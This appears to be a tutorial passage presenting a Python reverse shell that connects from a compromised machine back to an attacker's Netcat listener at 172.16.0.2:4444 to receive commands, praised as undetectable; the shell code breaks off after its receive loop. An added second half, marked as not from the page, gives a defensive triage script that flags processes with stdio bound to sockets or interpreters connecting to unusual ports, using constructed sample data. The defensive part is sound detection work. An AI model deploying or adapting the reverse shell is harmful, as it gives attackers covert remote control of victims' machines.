The following script we're going to create uses Python's socket module (a plain TCP stream socket, not a raw socket) to move data out of a network. The general idea of this shell is to create a connection from the compromised machine back to your own machine, where a Netcat (or other program) session is listening, and to send commands to the compromised machine over that connection.
The beauty of this Python script is the undetectable nature of it, as it appears as a completely legitimate script.
This is the script that will establish a connection through Netcat and read the input:
import socket
import subprocess
import sys
import time

HOST = '172.16.0.2'  # Your attacking machine to connect back to
PORT = 4444          # The port your attacking machine is listening on


def connect(addr):
    # addr is a (host, port) tuple; unpacking it here keeps the call
    # connect((HOST, PORT)) working on Python 3, which no longer allows
    # tuple parameters in a def line.
    host, port = addr
    go = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    go.connect((host, port))
    return go


def wait(go):
    # Read one chunk of whatever the listener typed. recv() returns bytes,
    # so the comparison is against a bytes literal.
    data = go.recv(1024)
    if data == b"exit\n":
        go.close()
        sys.exit(0)
    elif len(data) == 0:
        return
...
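From the defender's side, the script above has two observable traits: an interpreter process making an outbound connection to an uncommon port, and (in variants that wire a shell's stdin/stdout/stderr straight onto the socket rather than relaying through subprocess as this one does) standard file descriptors that resolve to a socket inode. The following is an added example, not code from the page or its author, that scores constructed process and connection telemetry against both signals; the record formats, the interpreter and port lists, and the sample data (including a fake process that connected out to 172.16.0.2:4444) are all assumptions made for the illustration.

```python
"""Triage heuristics for the reverse-shell pattern described above.

Illustrative, added example (not the page's own code). Two signals are checked:
  1. a process whose fds 0, 1 and 2 all point at a socket inode, the way
     /proc/<pid>/fd/N links look when a shell's stdio was dup2()'d onto a
     connected socket;
  2. an outbound connection from a scripting interpreter to a port that is
     not a common egress port.
All telemetry below is constructed sample data.
"""
import re
from dataclasses import dataclass, field

# Assumption: interpreters that rarely originate outbound connections on a
# typical server, so a connect() from them deserves a look.
SCRIPT_INTERPRETERS = {"python", "python2", "python3", "perl", "bash", "sh"}
# Assumption: ports where outbound traffic is ordinarily expected.
COMMON_EGRESS_PORTS = {22, 25, 53, 80, 443, 587, 993, 995}

SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


@dataclass
class ProcessRecord:
    pid: int
    comm: str                                  # executable name, as in /proc/<pid>/comm
    fds: dict = field(default_factory=dict)    # fd number -> readlink target


@dataclass
class ConnRecord:
    pid: int
    comm: str
    dst_ip: str
    dst_port: int
    direction: str                             # "out" or "in"


def stdio_bound_to_socket(proc):
    """True when fds 0, 1 and 2 all resolve to 'socket:[inode]'.

    An interactive shell normally has them on a pty (/dev/pts/N); a shell whose
    stdio was redirected onto a connected socket shows a socket inode for each.
    """
    return all(SOCKET_LINK.match(proc.fds.get(n, "")) is not None for n in (0, 1, 2))


def suspicious_egress(conn):
    """Outbound connection from a scripting interpreter to a non-standard port."""
    return (conn.direction == "out"
            and conn.comm in SCRIPT_INTERPRETERS
            and conn.dst_port not in COMMON_EGRESS_PORTS)


def triage(procs, conns):
    """Return (pid, reason) findings, strongest (both signals) first."""
    socket_shells = {p.pid for p in procs if stdio_bound_to_socket(p)}
    egress_pids = {c.pid for c in conns if suspicious_egress(c)}
    findings = []
    for pid in sorted(socket_shells & egress_pids):
        findings.append((pid, "stdio on socket AND unusual outbound connection"))
    for pid in sorted(socket_shells - egress_pids):
        findings.append((pid, "stdio bound to socket"))
    for pid in sorted(egress_pids - socket_shells):
        findings.append((pid, "scripting interpreter with unusual outbound connection"))
    return findings


# Constructed sample telemetry. PID 4242 mimics a python process that connected
# out to the page's listener address and port and put a shell on the socket.
SAMPLE_PROCS = [
    ProcessRecord(1000, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    ProcessRecord(4242, "python", {0: "socket:[51234]", 1: "socket:[51234]", 2: "socket:[51234]"}),
    ProcessRecord(4300, "python3", {0: "/dev/null", 1: "/var/log/app.log", 2: "/var/log/app.log"}),
]
SAMPLE_CONNS = [
    ConnRecord(1000, "bash", "10.0.0.5", 22, "out"),
    ConnRecord(4242, "python", "172.16.0.2", 4444, "out"),
    ConnRecord(4300, "python3", "93.184.216.34", 443, "out"),
]

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_PROCS, SAMPLE_CONNS):
        print(f"pid {pid}: {reason}")
```

Only the constructed PID 4242 trips both checks; the interactive bash session on a pty and the python3 service talking to port 443 are left alone. The two signals are deliberately kept separate so that a relay-style shell like the one on this page (whose own stdio stays on a terminal) is still surfaced by the egress check, while a shell with dup2()'d descriptors is caught even when its destination port happens to look ordinary.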